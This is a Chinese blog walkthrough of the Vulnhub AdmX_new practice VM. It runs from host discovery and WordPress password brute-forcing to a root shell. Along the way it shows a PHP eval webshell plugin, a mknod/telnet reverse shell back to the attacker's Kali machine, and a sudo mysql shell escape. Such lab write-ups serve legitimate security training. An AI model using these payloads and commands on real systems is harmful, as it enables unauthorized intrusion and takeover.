Vulnhub--AdmX_new

已于 2023-06-15 14:07:27 修改
阅读量175 收藏
点赞数
文章标签: linux 运维 安全
于 2023-06-15 14:07:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45168704/article/details/131223403
版权

0x01靶机介绍

项目Value
镜像链接https://download.vulnhub.com/admx/AdmX_new.7z
作者未知
发布日期2021年5月11日
难度中等
目的获取root权限

0x02靶机搭建

工具:VMware Workstation 17.0
镜像:AdmX_new.7z

搭建方式

解压AdmX_new.7z
VMware Workstation 17.0:
1.文件–>打开–>AdmX_new.ova,配置默认即可

在这里插入图片描述2.打开攻击机Kali(NAT模式)和靶机

NAT网段:192.168.47.0/24
Kali的ip地址: 192.168.47.128

0x03渗透流程

一.信息收集

1.主机发现
sudo netdiscover -i eth0

-i :网卡(ifconfig查看)
在这里插入图片描述

2.端口扫描
nmap -sV -p- 192.168.47.129

在这里插入图片描述

3.指纹收集
whatweb http://192.168.47.129

在这里插入图片描述

4.web目录扫描
dirb http://192.168.47.129

发现是wordpress cms
在这里插入图片描述

二.漏洞挖掘

1.getshell
wpscan --url http://192.168.47.129

没有扫到什么可以利用的信息
在这里插入图片描述
使用wpscan在wordpress的登陆页面进行暴力破解

wpscan –url http://192.168.47.129/wordpress/ –password-attack xmlrpc -U admin -P /usr/share/wordlists/rockyou.txt

得到一个用户名和密码:admin/adam14
在这里插入图片描述
使用Burp抓包发现js相应地址不对
在这里插入图片描述
设置里添加相应包将192.168.159.145替换为192.168.47.129然后刷新界面
在这里插入图片描述在这里插入图片描述
进入登陆界面登陆
在这里插入图片描述
生成一个PHP文件内容为

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:1111

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:1111

 * Author URI:1111

 * License:1111

 */


 @eval($_POST['cmd']); 
 
 
 ?>

压缩成zip后缀
在文件上传处上传

在这里插入图片描述
点击Activate激活
在这里插入图片描述
访问链接后使用蚁剑连接

http://192.168.47.129/wordpress/wp-content/plugins/shell.php

在这里插入图片描述
信息收集为低权限www
在这里插入图片描述

2.提权

kali开启监听:

nc -lvvp 7777

蚁剑执行:

mknod a p; telnet 192.168.47.128 7777 0<a | /bin/bash 1>a

成功获取反弹shell,

python3 -c "import pty;pty.spawn('/bin/bash')"
cat /etc/passwd

在这里插入图片描述
尝试用密码adam14登陆wpadmin用户成功
在这里插入图片描述

sudo -l

可以看到无需密码即可执行mysql登陆
在这里插入图片描述
mysql数据库密码adam14,进入后获取bash shell

\! /bin/bash

在这里插入图片描述

巴鸽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
App-v安装测试文档
11-07
软件介绍 Microsoft Application Virtualization (APP-V) ——微软应用程序虚拟化技术,所有软件通过预设的用户组进行管理,可在线使用程序并实时绿色安装到客户端电脑。 安装环境: 服务器端:Windows 2012域、sql server2012 客户端:Windows7 安装中需要的软件、补丁: Windows6.1-KB2533623、 Windows6.1-KB2506143(powershell 3.0)、 .net4.5 完整版(dotnet4.5NDP451-KB2858728-x86-x64-AllOS-ENU)。 Silverlight(浏览器插件,用于打开服务端网页进行配置) MDOP_ADMX_Templates(app-v组策略模版,安装在域控上)
AdmX_new靶场
zjxxxy的博客
06-15 114
vulnhub靶场AdmX_new攻略
AdmX_new靶机渗透过程
捣蛋鬼
04-02 4623
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
office-admx
02-14
office-admx
t6AdmX_new靶机
08-03
t6AdmX_new靶机
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 156
BP自动替换、另类提权方法
Admx_new
果粒程
11-22 285
Admx_new
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1233
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Office 2010-365 ADMX/ADML
08-05
适用于 Office 2010/2013/2016/2019/2021/365 的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
Firefox ADMX-开源
07-01
Firefox ADMX 是一种允许通过 Active Directory 中的组策略和管理模板在 Firefox 中集中管理锁定和/或默认设置的方法。 Firefox ADMX 是 Mark Sammons 的 Firefox ADM 的延续。
vulnhub4
qq_64201116的博客
11-24 325
靶机地址: https://download.vulnhub.com/admx/AdmX_new.7zfscan 扫一下 ​ 全端口再扫一下 ​ 只开放了一个 80 端口,所以肯定是有 web 服务,访问 http://192.168.120.138 是一个默认的 apache2 页面扫一下他的目录,肯定是有东西的,如果目录没有东西,就找他的域名 ​ 发现一个 wordpress 服务但是加载资源非常卡看他 F12 的页面​733 x 5101393 x 969​发现他写死访问的资源再 html 了用
靶机四:AdmX_new
travelnight的博客
05-05 144
靶机四:AdmX_new https://download.vulnhub.com/admx/AdmX_new.7z
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1044
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 797
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1129
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
Linux:浏览器访问网站的基本流程(优先级从先到后)
最新发布
fox_kang的博客
04-28 604
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 584
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
jianjian的博客
04-23 980
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。
linux的“>”和“>>”
qq_45212655的博客
04-24 458
文件存在,新的输出将被添加到文件的内容之后;如果文件不存在,将会创建一个新文件。文件存在,它的内容将被新的输出覆盖;如果文件不存在,将会创建一个新文件。都是用于文件重定向的操作符,它们用于将命令的输出发送到文件中。用于创建一个新文件或覆盖现有文件的内容。用于将输出附加到现有文件的末尾,而不是覆盖它。
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值